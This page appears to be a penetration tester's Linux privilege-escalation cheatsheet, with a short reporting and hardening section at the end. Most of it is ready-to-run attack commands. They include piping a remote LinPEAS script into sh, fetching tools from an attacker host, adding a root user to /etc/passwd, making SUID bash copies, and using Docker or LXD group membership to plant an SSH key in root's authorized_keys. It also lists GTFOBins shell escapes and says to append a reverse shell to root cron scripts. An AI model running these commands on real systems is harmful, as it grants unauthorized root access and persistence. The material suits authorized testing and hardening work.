Field Manual

Linux PrivEsc Quick Reference

4 min read

🛡️ Methodology Checklist

  • Run automated tool first (LinPEAS / linuxprivchecker)
  • Check all quick-win vectors: sudo -l, SUID, cron, PATH
  • Cross-reference automated findings with manual checklist
  • Attempt highest-confidence vector first
  • Try kernel exploit if all other vectors exhausted
  • Document successful escalation path for report

🎯 Operational Context

Use when: Linux shell obtained — quick enumeration commands to identify privilege escalation paths in under 5 minutes. Think Dumber First: Four commands: sudo -l, find / -perm -4000 -type f 2>/dev/null, cat /etc/crontab, id. These four cover sudo misconfigs, SUID binaries, cron jobs, and group membership — the four most common Linux privesc categories. Skip when: Already root — skip enumeration and proceed to post-exploitation objectives.

⚡ Tactical Cheatsheet

CommandTactical Outcome
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | shRun LinPEAS directly (no disk write)
wget http://[LHOST]/linpeas.sh -O /tmp/lpe.sh && chmod +x /tmp/lpe.sh && /tmp/lpe.sh 2>/dev/null | tee /tmp/lpe.outTransfer + run LinPEAS, save output
wget http://[LHOST]/pspy64 -O /tmp/pspy64 && chmod +x /tmp/pspy64 && /tmp/pspy64 -pf -i 1000Transfer + run pspy process monitor
screen -vCheck screen version (4.5.0 = vulnerable)
find / -perm -4000 2>/dev/null | grep screenConfirm SUID screen
bash screenroot.shscreen 4.5.0 LPE via ld.so.preload
docker run -v /:/mnt --rm -it alpine chroot /mnt shDocker group escape → root on host
lxc init alpine alpine -c security.privileged=true && lxc config device add alpine mydevice disk source=/ path=/mnt/root recursive=true && lxc start alpine && lxc exec alpine /bin/shLXD group → privileged container → host root
openssl passwd -1 [PASS]Generate /etc/passwd hash for user addition
echo 'root2:[HASH]:0:0:root:/root:/bin/bash' >> /etc/passwdAdd root user if /etc/passwd writable
cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbashCreate SUID bash copy (if running as root from other exploit)
/tmp/rootbash -pExecute SUID bash with preserved effective UID

🔬 Deep Dive & Workflow

PrivEsc Decision Tree

Run: sudo -l
└── NOPASSWD entry → GTFOBins → instant win

Run: id
├── docker group → docker container escape
├── lxd group → LXD container mount
├── disk group → read raw disk → /etc/shadow
└── adm group → read logs → credential hunt

Run: find / -user root -perm -4000 2>/dev/null
└── Non-standard SUID → GTFOBins → shell escape
    screen 4.5.0 → ld.so.preload exploit
    pkexec → PwnKit CVE-2021-4034

Run: cat /etc/crontab; pspy64
└── Root cron runs writable script → append reverse shell

Run: uname -a
└── Old kernel → searchsploit "linux kernel [version]"
    → DirtyCow (CVE-2016-5195) for kernels < 4.8.3

Run: getcap -r / 2>/dev/null
└── Dangerous capability (+ep) on python/perl/vim → setuid(0)

LinPEAS Key Output Sections

[*] Sudo version   → searchsploit "sudo [version]"
[*] SUID files     → compare against GTFOBins
[*] Cron jobs      → check writable scripts
[*] Files w/ pass  → grepped credentials
[*] .ssh           → private keys
[*] Network        → internal services on localhost
[*] PATH writable  → PATH hijack opportunity

Container Escapes

# Docker group → mount host root
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
 
# Verify inside container:
cat /mnt/etc/shadow   # = host shadow file
 
# Add root SSH key:
mkdir /mnt/root/.ssh
echo "[YOUR_PUBKEY]" >> /mnt/root/.ssh/authorized_keys

screen 4.5.0 LPE Summary

1. Verify: screen -v → 4.05.00
2. Verify: find / -perm -4000 2>/dev/null | grep screen
3. Transfer screenroot.sh → bash screenroot.sh
   (compiles libhax.so → forces load via ld.so.preload → SUID rootshell)
4. /tmp/rootshell → root shell
No gcc on target: compile libhax.so + rootshell on Kali (match arch), transfer to /tmp/

GTFOBins Quick Hits

BinaryEscape Command
findfind . -exec /bin/sh -p \; -quit
python/python3python3 -c 'import os; os.execl("/bin/sh","sh","-p")'
vim/vi:set shell=/bin/bash:shell or :!/bin/bash
less/more!/bin/sh
awkawk 'BEGIN {system("/bin/sh")}'
bash (SUID)/bin/bash -p
nmapnmap --interactive!sh (old nmap)
cpcp /bin/sh /tmp && chmod +s /tmp/sh && /tmp/sh -p

🛠️ Troubleshooting & Edge Cases

ProblemCauseFix
sudo -l shows nothingNo sudo configured for this userUser not in sudoers; check group membership: id for sudo/wheel/admin groups
SUID find returns too many resultsSystem SUID binaries includedFilter to non-standard: find / -perm -4000 -type f 2>/dev/null | grep -v '/usr/bin/|/bin/'
Cron jobs not visibleUser crontabs separate from systemCheck: crontab -l for current user; ls /var/spool/cron/crontabs/ for all users (need root)
LinPEAS not availableNo internet or restricted shellUse this quick reference for manual checks; all commands here work on minimal installs
No obvious privesc pathAll standard checks cleanCheck: capabilities getcap -r / 2>/dev/null, writable /etc/passwd, docker/lxd group, NFS no_root_squash

📝 Reporting Trigger

Finding Title: Linux Privilege Escalation Vector Identified via Quick Enumeration Impact: Rapid 5-minute manual enumeration identifies SUID binary abuse, sudo misconfiguration, or cron job hijacking that allows privilege escalation to root without additional exploitation. Root Cause: Linux system not hardened against standard privilege escalation techniques. Default or misconfigured permissions not reviewed post-deployment. Recommendation: Run LinPEAS against all Linux systems during hardening reviews. Apply CIS Linux Benchmark. Audit SUID/SGID binaries and remove unnecessary bits. Review sudo configurations against GTFOBins escape catalog.

🔗 Related Nodes

Graph View

Backlinks